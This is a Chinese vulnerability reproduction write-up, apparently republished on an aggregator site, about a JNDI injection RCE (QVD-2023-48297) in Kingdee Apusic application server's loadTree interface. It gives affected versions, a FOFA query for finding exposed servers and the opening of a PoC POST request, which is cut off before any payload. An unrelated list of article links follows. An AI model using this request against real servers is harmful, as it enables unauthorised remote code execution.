当前位置: 首页 > news >正文

金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)

news 2025/8/5 9:53:19

0x01 产品简介

金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

0x02 漏洞概述

由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)

0x03 影响范围

影响版本

金蝶Apusic应用服务器 <= V9.0 SP7

不受影响版本

金蝶Apusic应用服务器 > V9.0 SP7

0x04 复现环境

FOFA:app="Apusic应用服务器"

0x05 漏洞复现

PoC

POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
http://www.lryc.cn/news/265905.html

相关文章:

  • PromptNER: Prompt Locating and Typing for Named Entity Recognition
  • QT编写应用的界面自适应分辨率的解决方案
  • Kubernetes pod ip 暴露
  • 442. 数组中重复的数据
  • Qt/C++视频监控Onvif工具/组播搜索/显示监控画面/图片参数调节/OSD管理/祖传原创
  • word2003 open word2007+
  • windows安装、基本使用vim
  • 【SpringBoot快速入门】(1)SpringBoot的开发步骤、工程构建方法以及工程的快速启动详细讲解
  • Day69力扣打卡
  • 机器学习:手撕 AlphaGo(一)
  • ElasticSearch学习篇9_文本相似度计算方法现状以及基于改进的 Jaccard 算法代码实现
  • 大创项目推荐 深度学习+python+opencv实现动物识别 - 图像识别
  • Debezium系列之:Flink SQL消费Debezium数据格式,同步数据到下游存储系统
  • webrtc支持的最小宽度和高度
  • 虚拟机对象的创建
  • 阿里云吴结生:云计算是企业实现数智化的阶梯
  • MySQL——复合查询
  • mysql 23-3day 数据库授权(DCL)
  • OpenHarmony之内核层解析~
  • Chatgpt如何共享可以防止封号!
  • 智能优化算法应用:基于社交网络算法3D无线传感器网络(WSN)覆盖优化 - 附代码
  • thinkphp+vue+mysql酒店客房管理系统 b1g8z
  • nodejs+vue+ElementUi摄影作品图片分享工作室管理系统
  • 详解FreeRTOS:专栏总述
  • 在 linux 服务器上安装Redis数据库
  • 阿里云经济型、通用算力型、计算型、通用型、内存型云服务器最新活动报价
  • 回溯算法 典型习题
  • 14. 从零用Rust编写正反向代理, HTTP文件服务器的实现过程及参数
  • 【随笔】MD5加密字符串、文件apache、springframework实现
  • java八股 设计模式